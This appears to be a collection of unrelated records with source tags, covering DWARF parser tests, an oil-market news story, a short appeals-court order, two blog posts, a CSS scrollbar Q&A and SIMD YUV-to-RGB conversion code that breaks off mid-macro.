dwarf2reader::DW_FORM_exprloc);
info.ULEB128(29)
.Append(29, 173);
info.Finish();
ExpectBeginCompilationUnit(GetParam(), (DwarfTag) 0xb6d167bb);
EXPECT_CALL(handler, ProcessAttributeBuffer(_, (DwarfAttribute) 0xba3ae5cb,
dwarf2reader::DW_FORM_exprloc,
Pointee(173), 29))
.InSequence(s)
.WillOnce(Return());
ExpectEndCompilationUnit();
ParseCompilationUnit(GetParam());
}
TEST_P(DwarfForms, ref_sig8) {
StartSingleAttributeDIE(GetParam(), (DwarfTag) 0x253e7b2b,
(DwarfAttribute) 0xd708d908,
dwarf2reader::DW_FORM_ref_sig8);
info.D64(0xf72fa0cb6ddcf9d6ULL);
info.Finish();
ExpectBeginCompilationUnit(GetParam(), (DwarfTag) 0x253e7b2b);
EXPECT_CALL(handler, ProcessAttributeSignature(_, (DwarfAttribute) 0xd708d908,
dwarf2reader::DW_FORM_ref_sig8,
0xf72fa0cb6ddcf9d6ULL))
.InSequence(s)
.WillOnce(Return());
ExpectEndCompilationUnit();
ParseCompilationUnit(GetParam());
}
// A value passed to ProcessAttributeSignature is just an absolute number,
// not an offset within the compilation unit as most of the other
// DW_FORM_ref forms are. Check that the reader doesn't try to apply any
// offset to the signature, by reading it from a compilation unit that does
// not start at the beginning of the section.
TEST_P(DwarfForms, ref_sig8_not_first) {
info.Append(98, '*');
StartSingleAttributeDIE(GetParam(), (DwarfTag) 0x253e7b2b,
(DwarfAttribute) 0xd708d908,
dwarf2reader::DW_FORM_ref_sig8);
info.D64(0xf72fa0cb6ddcf9d6ULL);
info.Finish();
ExpectBeginCompilationUnit(GetParam(), (DwarfTag) 0x253e7b2b, 98);
EXPECT_CALL(handler, ProcessAttributeSignature(_, (DwarfAttribute) 0xd708d908,
dwarf2reader::DW_FORM_ref_sig8,
0xf72fa0cb6ddcf9d6ULL))
.InSequence(s)
.WillOnce(Return());
ExpectEndCompilationUnit();
ParseCompilationUnit(GetParam(), 98);
}
// Tests for the other attribute forms could go here.
INSTANTIATE_TEST_CASE_P(
HeaderVariants, DwarfForms,
::testing::Values(DwarfHeaderParams(kLittleEndian, 4, 2, 4),
DwarfHeaderParams(kLittleEndian, 4, 2, 8),
DwarfHeaderParams(kLittleEndian, 4, 3, 4),
DwarfHeaderParams(kLittleEndian, 4, 3, 8),
DwarfHeaderParams(kLittleEndian, 4, 4, 4),
DwarfHeaderParams(kLittleEndian, 4, 4, 8),
DwarfHeaderParams(kLittleEndian, 8, 2, 4),
DwarfHeaderParams(kLittleEndian, 8, 2, 8),
DwarfHeaderParams(kLittleEndian, 8, 3, 4),
DwarfHeaderParams(kLittleEndian, 8, 3, 8),
DwarfHeaderParams(kLittleEndian, 8, 4, 4),
DwarfHeaderParams(kLittleEndian, 8, 4, 8),
DwarfHeaderParams(kBigEndian, 4, 2, 4),
DwarfHeaderParams(kBigEndian, 4, 2, 8),
DwarfHeaderParams(kBigEndian, 4, 3, 4),
DwarfHeaderParams(kBigEndian, 4, 3, 8),
DwarfHeaderParams(kBigEndian, 4, 4, 4),
DwarfHeaderParams(kBigEndian, 4, 4, 8),
DwarfHeaderParams(kBigEndian, 8, 2, 4),
DwarfHeaderParams(kBigEndian, 8, 2, 8),
DwarfHeaderParams(kBigEndian, 8, 3, 4),
DwarfHeaderParams(kBigEndian, 8, 3, 8),
DwarfHeaderParams(kBigEndian, 8, 4, 4),
DwarfHeaderParams(kBigEndian, 8, 4, 8)));
|
{
"pile_set_name": "Github"
}
|
GuessWho I'm probably the 1 out of 10 viewers that get that joke. Invader Zim was an awesome show! Anyways Well done Adam i'm pretty sure i've gone through your whole archive in a day. I'll be back to check in for updates every once in a while as well!
|
{
"pile_set_name": "Pile-CC"
}
|
Prices will recover from a slump due to a glut created by a lack of cooperation from producers outside the Organization of Petroleum Exporting Countries, Saudi Arabia Oil Minister Ali Al- Naimi said at a conference in Abu Dhabi. Al-Naimi ended his speech showing the confidence as he jumped off the stage and smiled.
Brent oil tumbled into a bear market this year as the U.S. pumped the most oil in more than three decades and economic growth slowed from China to Germany. Global crude demand was about 700,000 barrels a day this year, below the projected 1.2 million barrels a day, Al-Naimi said.
“The oil market will recover,” Al-Naimi said. “Fossil fuel will remain the main source of energy for decades to come.”
Oil surged from a five-year low at the end of last week after Al-Naimi said the slump in prices was temporary. West Texas Intermediate climbed 4.5 percent to $56.52 a barrel on Dec. 19 and Brent advanced 3.6 percent to $61.38 a barrel. Saudi Arabia accounted for about 13 percent of global oil output last year, BP Plc estimates.
Bullish Wagers
Money managers are the most bullish since August about the rout being over. The net-long position in West Texas Intermediate rose by 26,455 contracts to 217,723 futures and options in the week ended Dec. 16, the most since mid August, U.S. Commodity Futures Trading Commission data show.
“We are now in a provisional, correctional period,” Mohammed Al Sada, Qatar’s energy minister, said at the conference. “Markets have stabilization mechanisms that will bring stability. We don’t know exactly how long it will take but it will stabilize because the current prices will separate the efficient producers from the producers who have high costs.”
Lower oil prices won’t have a major effect on Saudi Arabia’s economy, Al-Naimi said. Economic growth will expand 4.3 percent this year and 3.6 percent next year, according to analyst estimates compiled by Bloomberg.
High prices in the past three years and technological developments contributed to increased production, resulting in lower oil prices, Al-Naimi said. Brent averaged $100.61 a barrel this year, down from $108.71 in 2013 and $111.68 in 2012.
Output in the U.S. is the highest in three decades as companies split rocks to produce shale oil. Current prices won’t stimulate investment in energy in the long run, Al-Naimi said.
Saudi Arabia has 265 billion barrels of oil reserves, and will increase refining capacity to 3.3 million barrels a day by 2017 from 2.1 million barrels in 2014, Al-Naimi said. It’s also looking to more joint ventures in downstream projects abroad, he said.
The nation wants to become an international hub for climate change and carbon emissions research, he said. Al-Naimi attended United Nations global warming talks in Lima, Peru, this month.
|
{
"pile_set_name": "Pile-CC"
}
|
934 F.2d 321Unpublished Disposition
NOTICE: Fourth Circuit I.O.P. 36.6 states that citation of unpublished dispositions is disfavored except for establishing res judicata, estoppel, or the law of the case and requires service of copies of cited unpublished dispositions of the Fourth Circuit.In re Curtis L. WRENN, individually and on behalf of allothers similarly situated, Petitioner.
No. 91-8106.
United States Court of Appeals, Fourth Circuit.
Submitted May 6, 1991.Decided May 29, 1991.
On Petition for Writ of Mandamus.
Curtis L. Wrenn, petitioner pro se.
PETITION DENIED.
Before DONALD RUSSELL, WILKINSON and WILKINS, Circuit Judges.
PER CURIAM:
1
Curtis Wrenn brought this petition for a writ of mandamus seeking an order directing the district court to reopen a case which it dismissed in January 1991. He claimed that he did not receive notice of the dismissal in time to file a notice of appeal in compliance with Fed.R.App.P. 4(a).1
2
A mandamus petition may not be used as a substitute for appeal. In re United Steelworkers, 595 F.2d 958, 960 (4th Cir.1979). Further, mandamus relief is not appropriate when there is another remedy available to the petitioner. In re Beard, 811 F.2d 818, 826 (4th Cir.1987). Because Wrenn may file a motion for reconsideration in the district court pursuant to Fed.R.Civ.P. 60(b), and because he may not use this petition to avoid the time requirements of Fed.R.App.P. 4(a), we deny the petition. We dispense with oral argument because the facts and legal contentions are adequately presented in the material before the Court and argument would not significantly aid the decisional process.
3
PETITION DENIED.
1
We note that failure to receive notice of an order entered by the clerk does not serve to extend the time in which a notice of appeal may be filed. Fed.R.Civ.P. 77(d)
|
{
"pile_set_name": "FreeLaw"
}
|
Monday, May 02, 2005
I just finished a brilliant article in the June 2005 issue of Psychology Today called "The Superpowers." It discusses the X-factors such as charisma,chutzpah,joie de virvre and grace. Here are some of the highlights...
* * *
"X-factors are enviable dispositions that defy easy definition; even as they are immediately recognizable in people we admire...they project a positive energy that radiates beyond the person who embodies them. Only recently have psychologists begun to articulate and study what X-factors are made of...here are the four major types:
1) CharismaIt is, in fact, just short of magic: it's a rare quality but common in figures who inspire devotion. Charismatic people are essentially brilliant communicators...they consist of overlapping components such as expressivity, sensitivity, control, eloquence, vision and self-confidence.
Synchrony may be the key to charisma. Synchrony is a marker of rapport; if two people click, they unconsciously adjust their posture and speech rate to each other. Charasmatic people are natural 'attractors,' who get others to synchronize to them.
2) ChutzpahChutzpah makes our jaws drop because it openly challenges our conformist tendencies. It is a behavior that crosses a social norm, not merely to get away with something, but rather to purposefully challenge convention.
3) Joie de VivrePeople with joie de vivre are like windup dolls that never run down. They are passionate explorers who view their work as play. They're a lot of fun to be around. AKA 'exuberance,' it spreads quickly and expands people's sense of possibilities.
Positive rewards like social interaction do more for them (people with this X-factor) than they do for others. As a result, they are motivated not only to meet new people but to connect well with them.
4) GraceGrace, AKA "benevolence," is the quietest of the X-factors. Wisdom is also associated with benevolence, and it is in warm, compassionate individuals that we often see grace. Another key to grace is equaniminty, the ability to accept life's inevitable slings and arrows. The charm and kindness that we associate with regal beauties like Audrey Hepburn or Grace Kelley are another form of grace, one that surpasses their breeding and impeccable manners.
|
{
"pile_set_name": "Pile-CC"
}
|
February 25, 2005
Sure there's snow and ice here in Maryland, but apparently it's really cold in Howard County, where the Baltimore Sun reports there will be an "alternative sex" convention this weekend. The residents are, shall we say, not enthusiastic.
"Would you want to put your baby on the bedspread? This hotel is a residential community. Is it appropriate for our community?" said Ingrid Holzman, 42, who lives with her husband and two children in a home on the 800-acre golf course property. "I moved here eight months ago from Massachusetts. I'm not a prude."
But the idea that her family might have gone to dinner at the hotel restaurant without knowing about the "Dark Odyssey -Winter Fire" participants walking the same hallways upset her, she said. The two-day event is so popular that the hotel's 220 rooms are full, and some participants are renting rooms in other hotels, according to the event's Web site.
The Sun describes the convention:
On its Web site, Dark Odyssey is billed as "a vacation where you can explore the many facets of sexuality in a private, intimate community of like-minded people," featuring "a multitude of partnering possibilities, from swinging and open relationships to threesomes."
Howard County police Chief Wayne Livesay talked to hotel management at Turf Valley yesterday and is "comfortable that all public safety issues are being taken care of appropriately," at the Dark Odyssey convention, said police spokesman Dave Proulx.
Well, according the Dark Odyssey web site -- only the bare-bones (yuk!) home page seems to be accessible, not that I'd really like to explore it too far, anyway -- the event is indeed sold out.
All I can say is: Eeeeewwwwww! Spring Break for the middle-aged crowd.
UPDATE (2/25): Just remembered that Dave Barry had a column a couple of years ago about attending a swingers' convention -- "for journalism purposes." An excerpt:
The thong appears to be a major weapon in the swinger's fashion arsenal. This is not necessarily a good thing. Your taut-bodied individual may be able to pull it off (har!), but when you see a portly middle-aged man who has more body hair than a musk ox and (I swear) a tattoo of Elvis on his right butt cheek stroll past wearing essentially a No. 8 rubber band, you begin to think that maybe it's time Congress enacted strict Federal Thong Control.
In case I get the urge to write some more stupidity outside of Pillage Idiot, and you want to receive it in email form, send me an email (correct the address first), and I'll add you to the Pillage Idiot Retirement Mailing List.
|
{
"pile_set_name": "Pile-CC"
}
|
Q:
CSS webkit scrollbar show/hide
I'm using -webkit-scrollbar and what I want to happen is the scrollbar hidden on page load, and it stays hidden until you hover over the container div it is attached to. When you are hovering over a scrollable area, it would appear.
I tried adding :hover and :focus affects to various divs and rules in my CSS with no luck.
Is there a way to do what I'm referring to using -webkit-scrollbar? I could post code, but its pretty straightforward. Just one outer div with the css rules attached to it, then one inner div with set height and width. Then the css rules for -webkit-scrollbar.
#u #trail ::-webkit-scrollbar {
width: 9px;
height: 9px;
}
#u #trail ::-webkit-scrollbar-button:start:decrement,
#u #trail ::-webkit-scrollbar-button:end:increment {
display: block;
height: 0;
background-color: transparent;
}
#u #trail ::-webkit-scrollbar-track-piece {
background-color: #FAFAFA;
-webkit-border-radius: 0;
-webkit-border-bottom-right-radius: 8px;
-webkit-border-bottom-left-radius: 8px;
}
#u #trail ::-webkit-scrollbar-thumb:vertical {
height: 50px;
background-color: #999;
-webkit-border-radius: 8px;
}
#u #trail ::-webkit-scrollbar-thumb:horizontal {
width: 50px;
background-color: #999;
-webkit-border-radius: 8px;
}
#u #trail-overflow {
width: 860px;
max-height: 500px;
overflow: auto;
}
A:
I seem to have got through the auto hide thing in css. I somehow did it on my app, and was searching how I got it. Here it is, a modification to the existing fiddle by @tim
http://jsfiddle.net/4RSbp/165/
This does the trick:
body {overflow-y:hidden;}
body:hover {overflow-y:scroll;}
A:
You can use simple CSS to achieve this.
Eg. if you have a div #content-wrapperthat scrolls with background-color: rgb(250, 249, 244);
#content-wrapper::-webkit-scrollbar-thumb {
background-color: rgb(250, 249, 244); /* Matches the background color of content-wrapper */
}
#content-wrapper:hover::-webkit-scrollbar-thumb {
background-color: gray;
}
F.Y.I. You could set the thumb's opacity to zero (instead of matching the background color), but the opacity seems to then apply to other scrollbars on the page as well.
P.S. This assumes that you're ::-webkit-scrollbar-track's background color also matches the #content-wrapper's background color.
A:
I ended up going with the slimscroll javascript plugin. It would be cool to have an all-css solution, but this plugin is done very well, and allows the focus-shown/hidden idea.
http://rocha.la/jQuery-slimScroll
|
{
"pile_set_name": "StackExchange"
}
|
// Copyright 2016 Adrien Descamps
// Distributed under BSD 3-Clause License
/* You need to define the following macros before including this file:
SSE_FUNCTION_NAME
STD_FUNCTION_NAME
YUV_FORMAT
RGB_FORMAT
*/
/* You may define the following macro, which affects generated code:
SSE_ALIGNED
*/
#ifdef SSE_ALIGNED
/* Unaligned instructions seem faster, even on aligned data? */
/*
#define LOAD_SI128 _mm_load_si128
#define SAVE_SI128 _mm_stream_si128
*/
#define LOAD_SI128 _mm_loadu_si128
#define SAVE_SI128 _mm_storeu_si128
#else
#define LOAD_SI128 _mm_loadu_si128
#define SAVE_SI128 _mm_storeu_si128
#endif
#define UV2RGB_16(U,V,R1,G1,B1,R2,G2,B2) \
r_tmp = _mm_mullo_epi16(V, _mm_set1_epi16(param->v_r_factor)); \
g_tmp = _mm_add_epi16( \
_mm_mullo_epi16(U, _mm_set1_epi16(param->u_g_factor)), \
_mm_mullo_epi16(V, _mm_set1_epi16(param->v_g_factor))); \
b_tmp = _mm_mullo_epi16(U, _mm_set1_epi16(param->u_b_factor)); \
R1 = _mm_unpacklo_epi16(r_tmp, r_tmp); \
G1 = _mm_unpacklo_epi16(g_tmp, g_tmp); \
B1 = _mm_unpacklo_epi16(b_tmp, b_tmp); \
R2 = _mm_unpackhi_epi16(r_tmp, r_tmp); \
G2 = _mm_unpackhi_epi16(g_tmp, g_tmp); \
B2 = _mm_unpackhi_epi16(b_tmp, b_tmp); \
#define ADD_Y2RGB_16(Y1,Y2,R1,G1,B1,R2,G2,B2) \
Y1 = _mm_mullo_epi16(_mm_sub_epi16(Y1, _mm_set1_epi16(param->y_shift)), _mm_set1_epi16(param->y_factor)); \
Y2 = _mm_mullo_epi16(_mm_sub_epi16(Y2, _mm_set1_epi16(param->y_shift)), _mm_set1_epi16(param->y_factor)); \
\
R1 = _mm_srai_epi16(_mm_add_epi16(R1, Y1), PRECISION); \
G1 = _mm_srai_epi16(_mm_add_epi16(G1, Y1), PRECISION); \
B1 = _mm_srai_epi16(_mm_add_epi16(B1, Y1), PRECISION); \
R2 = _mm_srai_epi16(_mm_add_epi16(R2, Y2), PRECISION); \
G2 = _mm_srai_epi16(_mm_add_epi16(G2, Y2), PRECISION); \
B2 = _mm_srai_epi16(_mm_add_epi16(B2, Y2), PRECISION); \
#define PACK_RGB565_32(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4) \
{ \
__m128i red_mask, tmp1, tmp2, tmp3, tmp4; \
\
red_mask = _mm_set1_epi16((short)0xF800); \
RGB1 = _mm_and_si128(_mm_unpacklo_epi8(_mm_setzero_si128(), R1), red_mask); \
RGB2 = _mm_and_si128(_mm_unpackhi_epi8(_mm_setzero_si128(), R1), red_mask); \
RGB3 = _mm_and_si128(_mm_unpacklo_epi8(_mm_setzero_si128(), R2), red_mask); \
RGB4 = _mm_and_si128(_mm_unpackhi_epi8(_mm_setzero_si128(), R2), red_mask); \
tmp1 = _mm_slli_epi16(_mm_srli_epi16(_mm_unpacklo_epi8(G1, _mm_setzero_si128()), 2), 5); \
tmp2 = _mm_slli_epi16(_mm_srli_epi16(_mm_unpackhi_epi8(G1, _mm_setzero_si128()), 2), 5); \
tmp3 = _mm_slli_epi16(_mm_srli_epi16(_mm_unpacklo_epi8(G2, _mm_setzero_si128()), 2), 5); \
tmp4 = _mm_slli_epi16(_mm_srli_epi16(_mm_unpackhi_epi8(G2, _mm_setzero_si128()), 2), 5); \
RGB1 = _mm_or_si128(RGB1, tmp1); \
RGB2 = _mm_or_si128(RGB2, tmp2); \
RGB3 = _mm_or_si128(RGB3, tmp3); \
RGB4 = _mm_or_si128(RGB4, tmp4); \
tmp1 = _mm_srli_epi16(_mm_unpacklo_epi8(B1, _mm_setzero_si128()), 3); \
tmp2 = _mm_srli_epi16(_mm_unpackhi_epi8(B1, _mm_setzero_si128()), 3); \
tmp3 = _mm_srli_epi16(_mm_unpacklo_epi8(B2, _mm_setzero_si128()), 3); \
tmp4 = _mm_srli_epi16(_mm_unpackhi_epi8(B2, _mm_setzero_si128()), 3); \
RGB1 = _mm_or_si128(RGB1, tmp1); \
RGB2 = _mm_or_si128(RGB2, tmp2); \
RGB3 = _mm_or_si128(RGB3, tmp3); \
RGB4 = _mm_or_si128(RGB4, tmp4); \
}
#define PACK_RGB24_32_STEP1(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6) \
RGB1 = _mm_packus_epi16(_mm_and_si128(R1,_mm_set1_epi16(0xFF)), _mm_and_si128(R2,_mm_set1_epi16(0xFF))); \
RGB2 = _mm_packus_epi16(_mm_and_si128(G1,_mm_set1_epi16(0xFF)), _mm_and_si128(G2,_mm_set1_epi16(0xFF))); \
RGB3 = _mm_packus_epi16(_mm_and_si128(B1,_mm_set1_epi16(0xFF)), _mm_and_si128(B2,_mm_set1_epi16(0xFF))); \
RGB4 = _mm_packus_epi16(_mm_srli_epi16(R1,8), _mm_srli_epi16(R2,8)); \
RGB5 = _mm_packus_epi16(_mm_srli_epi16(G1,8), _mm_srli_epi16(G2,8)); \
RGB6 = _mm_packus_epi16(_mm_srli_epi16(B1,8), _mm_srli_epi16(B2,8)); \
#define PACK_RGB24_32_STEP2(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6) \
R1 = _mm_packus_epi16(_mm_and_si128(RGB1,_mm_set1_epi16(0xFF)), _mm_and_si128(RGB2,_mm_set1_epi16(0xFF))); \
R2 = _mm_packus_epi16(_mm_and_si128(RGB3,_mm_set1_epi16(0xFF)), _mm_and_si128(RGB4,_mm_set1_epi16(0xFF))); \
G1 = _mm_packus_epi16(_mm_and_si128(RGB5,_mm_set1_epi16(0xFF)), _mm_and_si128(RGB6,_mm_set1_epi16(0xFF))); \
G2 = _mm_packus_epi16(_mm_srli_epi16(RGB1,8), _mm_srli_epi16(RGB2,8)); \
B1 = _mm_packus_epi16(_mm_srli_epi16(RGB3,8), _mm_srli_epi16(RGB4,8)); \
B2 = _mm_packus_epi16(_mm_srli_epi16(RGB5,8), _mm_srli_epi16(RGB6,8)); \
#define PACK_RGB24_32(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6) \
PACK_RGB24_32_STEP1(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6) \
PACK_RGB24_32_STEP2(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6) \
PACK_RGB24_32_STEP1(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6) \
PACK_RGB24_32_STEP2(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6) \
PACK_RGB24_32_STEP1(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6) \
#define PACK_RGBA_32(R1, R2, G1, G2, B1, B2, A1, A2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6, RGB7, RGB8) \
{ \
__m128i lo_ab, hi_ab, lo_gr, hi_gr; \
\
lo_ab = _mm_unpacklo_epi8( A1, B1 ); \
hi_ab = _mm_unpackhi_epi8( A1, B1 ); \
lo_gr = _mm_unpacklo_epi8( G1, R1 ); \
hi_gr = _mm_unpackhi_epi8( G1, R1 ); \
RGB1 = _mm_unpacklo_epi16( lo_ab, lo_gr ); \
RGB2 = _mm_unpackhi_epi16( lo_ab, lo_gr ); \
RGB3 = _mm_unpacklo_epi16( hi_ab, hi_gr ); \
RGB4 = _mm_unpackhi_epi16( hi_ab, hi_gr ); \
\
lo_ab = _mm_unpacklo_epi8( A2, B2 ); \
hi_ab = _mm_unpackhi_epi8( A2, B2 ); \
lo_gr = _mm_unpacklo_epi8( G2, R2 ); \
hi_gr = _mm_unpackhi_epi8( G2, R2 ); \
RGB5 = _mm_unpacklo_epi16( lo_ab, lo_gr ); \
RGB6 = _mm_unpackhi_epi16( lo_ab, lo_gr ); \
RGB7 = _mm_unpacklo_epi16( hi_ab, hi_gr ); \
RGB8 = _mm_unpackhi_epi16( hi_ab, hi_gr ); \
}
#if RGB_FORMAT == RGB_FORMAT_RGB565
#define PACK_PIXEL \
__m128i rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8; \
\
PACK_RGB565_32(r_8_11, r_8_12, g_8_11, g_8_12, b_8_11, b_8_12, rgb_1, rgb_2, rgb_3, rgb_4) \
\
PACK_RGB565_32(r_8_21, r_8_22, g_8_21, g_8_22, b_8_21, b_8_22, rgb_5, rgb_6, rgb_7, rgb_8) \
#elif RGB_FORMAT == RGB_FORMAT_RGB24
#define PACK_PIXEL \
__m128i rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6; \
__m128i rgb_7, rgb_8, rgb_9, rgb_10, rgb_11, rgb_12; \
\
PACK_RGB24_32(r_8_11, r_8_12, g_8_11, g_8_12, b_8_11, b_8_12, rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6) \
\
PACK_RGB24_32(r_8_21, r_8_22, g_8_21, g_8_22, b_8_21, b_8_22, rgb_7, rgb_8, rgb_9, rgb_10, rgb_11, rgb_12) \
#elif RGB_FORMAT == RGB_FORMAT_RGBA
#define PACK_PIXEL \
__m128i rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8; \
__m128i rgb_9, rgb_10, rgb_11, rgb_12, rgb_13, rgb_14, rgb_15, rgb_16; \
__m128i a = _mm_set1_epi8((char)0xFF); \
\
PACK_RGBA_32(r_8_11, r_8_12, g_8_11, g_8_12, b_8_11, b_8_12, a, a, rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8) \
\
PACK_RGBA_32(r_8_21, r_8_22, g_8_21, g_8_22, b_8_21, b_8_22, a, a, rgb_9, rgb_10, rgb_11, rgb_12, rgb_13, rgb_14, rgb_15, rgb_16) \
#elif RGB_FORMAT == RGB_FORMAT_BGRA
#define PACK_PIXEL \
__m128i rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8; \
__m128i rgb_9, rgb_10, rgb_11, rgb_12, rgb_13, rgb_14, rgb_15, rgb_16; \
__m128i a = _mm_set1_epi8((char)0xFF); \
\
PACK_RGBA_32(b_8_11, b_8_12, g_8_11, g_8_12, r_8_11, r_8_12, a, a, rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8) \
\
PACK_RGBA_32(b_8_21, b_8_22, g_8_21, g_8_22, r_8_21, r_8_22, a, a, rgb_9, rgb_10, rgb_11, rgb_12, rgb_13, rgb_14, rgb_15, rgb_16) \
#elif RGB_FORMAT == RGB_FORMAT_ARGB
#define PACK_PIXEL \
__m128i rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8; \
__m128i rgb_9, rgb_10, rgb_11, rgb_12, rgb_13, rgb_14, rgb_15, rgb_16; \
__m128i a = _mm_set1_epi8((char)0xFF); \
\
PACK_RGBA_32(a, a, r_8_11, r_8_12, g_8_11, g_8_12, b_8_11, b_8_12, rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8) \
\
PACK_RGBA_32(a, a, r_8_21, r_8_22, g_8_21, g_8_22, b_8_21, b_8_22, rgb_9, rgb_10, rgb_11, rgb_12, rgb_13, rgb_14, rgb_15, rgb_16) \
#elif RGB_FORMAT == RGB_FORMAT_ABGR
#define PACK_PIXEL \
__m128i rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8; \
__m128i rgb_9, rgb_10, rgb_11, rgb_12, rgb_13, rgb_14, rgb_15, rgb_16; \
__m128i a = _mm_set1_epi8((char)0xFF); \
\
PACK_RGBA_32(a, a, b_8_11, b_8_12, g_8_11, g_8_12, r_8_11, r_8_12, rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8) \
\
PACK_RGBA_32(a, a, b_8_21, b_8_22, g_8_21, g_8_22, r_8_21, r_8_22, rgb_9, rgb_10, rgb_11, rgb_12, rgb_13, rgb_14, rgb_15, rgb_16) \
#else
#error PACK_PIXEL unimplemented
#endif
#if RGB_FORMAT == RGB_FORMAT_RGB565
#define SAVE_LINE1 \
SAVE_SI128((__m128i*)(rgb_ptr1), rgb_1); \
SAVE_SI128((__m128i*)(rgb_ptr1+16), rgb_2); \
SAVE_SI128((__m128i*)(rgb_ptr1+32), rgb_3); \
SAVE_SI128((__m128i*)(rgb_ptr1+48), rgb_4); \
#define SAVE_LINE2 \
SAVE_SI128((__m128i*)(rgb_ptr2), rgb_5); \
SAVE_SI128((__m128i*)(rgb_ptr2+16), rgb_6); \
SAVE_SI128((__m128i*)(rgb_ptr2+32), rgb_7); \
SAVE_SI128((__m128i*)(rgb_ptr2+48), rgb_8); \
#elif RGB_FORMAT == RGB_FORMAT_RGB24
#define SAVE_LINE1 \
SAVE_SI128((__m128i*)(rgb_ptr1), rgb_1); \
SAVE_SI128((__m128i*)(rgb_ptr1+16), rgb_2); \
SAVE_SI128((__m128i*)(rgb_ptr1+32), rgb_3); \
SAVE_SI128((__m128i*)(rgb_ptr1+48), rgb_4); \
SAVE_SI128((__m128i*)(rgb_ptr1+64), rgb_5); \
SAVE_SI128((__m128i*)(rgb_ptr1+80), rgb_6); \
#define SAVE_LINE2 \
SAVE_SI128((__m128i*)(rgb_ptr2), rgb_7); \
SAVE_SI128((__m128i*)(rgb_ptr2+16), rgb_8); \
SAVE_SI128((__m128i*)(rgb_ptr2+32), rgb_9); \
SAVE_SI128((__m128i*)(rgb_ptr2+48), rgb_10); \
SAVE_SI128((__m128i*)(rgb_ptr2+64), rgb_11); \
SAVE_SI128((__m128i*)(rgb_ptr2+80), rgb_12); \
#elif RGB_FORMAT == RGB_FORMAT_RGBA || RGB_FORMAT == RGB_FORMAT_BGRA || \
RGB_FORMAT == RGB_FORMAT_ARGB || RGB_FORMAT == RGB_FORMAT_ABGR
#define SAVE_LINE1 \
SAVE_SI128((__m128i*)(rgb_ptr1), rgb_1); \
SAVE_SI128((__m128i*)(rgb_ptr1+16), rgb_2); \
SAVE_SI128((__m128i*)(rgb_ptr1+32), rgb_3); \
SAVE_SI128((__m128i*)(rgb_ptr1+48), rgb_4); \
SAVE_SI128((__m128i*)(rgb_ptr1+64), rgb_5); \
SAVE_SI128((__m128i*)(rgb_ptr1+80), rgb_6); \
SAVE_SI128((__m128i*)(rgb_ptr1+96), rgb_7); \
SAVE_SI128((__m128i*)(rgb_ptr1+112), rgb_8); \
#define SAVE_LINE2 \
SAVE_SI128((__m128i*)(rgb_ptr2), rgb_9); \
SAVE_SI128((__m128i*)(rgb_ptr2+16), rgb_10); \
SAVE_SI128((__m128i*)(rgb_ptr2+32), rgb_11); \
SAVE_SI128((__m128i*)(rgb_ptr2+48), rgb_12); \
SAVE_SI128((__m128i*)(rgb_ptr2+64), rgb_13); \
SAVE_SI128((__m128i*)(rgb_ptr2+80), rgb_14); \
SAVE_SI128((__m128i*)(rgb_ptr2+96), rgb_15); \
SAVE_SI128((__m128i*)(rgb_ptr2+112), rgb_16); \
#else
#error SAVE_LINE unimplemented
#endif
#if YUV_FORMAT == YUV_FORMAT_420
#define READ_Y(y_ptr) \
y = LOAD_SI128((const __m128i*)(y_ptr)); \
#define READ_UV \
u = LOAD_SI128((const __m128i*)(u_ptr)); \
v = LOAD_SI128((const __m128i*)(v_ptr)); \
#elif YUV_FORMAT == YUV_FORMAT_422
#define READ_Y(y_ptr) \
{ \
__m128i y1, y2; \
y1 = _mm_srli_epi16(_mm_slli_epi16(LOAD_SI128((const __m128i*)(y_ptr)), 8), 8); \
y2 = _mm_srli_epi16(_mm_slli_epi16(LOAD_SI128((const __m128i*)(y_ptr+16)), 8), 8); \
y = _mm_packus_epi16(y1, y2); \
}
#define READ_UV \
{ \
__m128i u1, u2, u3, u4, v1, v2, v3, v4; \
u1 = _mm_srli_epi32(_mm_slli_epi32(LOAD_SI128((const __m128i*)(u_ptr)), 24), 24); \
u2 = _mm_srli_epi32(_mm_slli_epi32(LOAD_SI128((const __m128i*)(u_ptr+16)), 24), 24); \
u3 = _mm_srli_epi32(_mm_slli_epi32(LOAD_SI128((const __m128i*)(u_ptr+32)), 24), 24); \
u4 = _mm_srli_epi32(_mm_slli_epi32(LOAD_SI128((const __m128i*)(u_ptr+48)), 24), 24); \
u = _mm_packus_epi16(_mm_packs_epi32(u1, u2), _mm_packs_epi32(u3, u4)); \
v1 = _mm_srli_epi32(_mm_slli_epi32(LOAD_SI128((const __m128i*)(v_ptr)), 24), 24); \
v2 = _mm_srli_epi32(_mm_slli_epi32(LOAD_SI128((const __m128i*)(v_ptr+16)), 24), 24); \
v3 = _mm_srli_epi32(_mm_slli_epi32(LOAD_SI128((const __m128i*)(v_ptr+32)), 24), 24); \
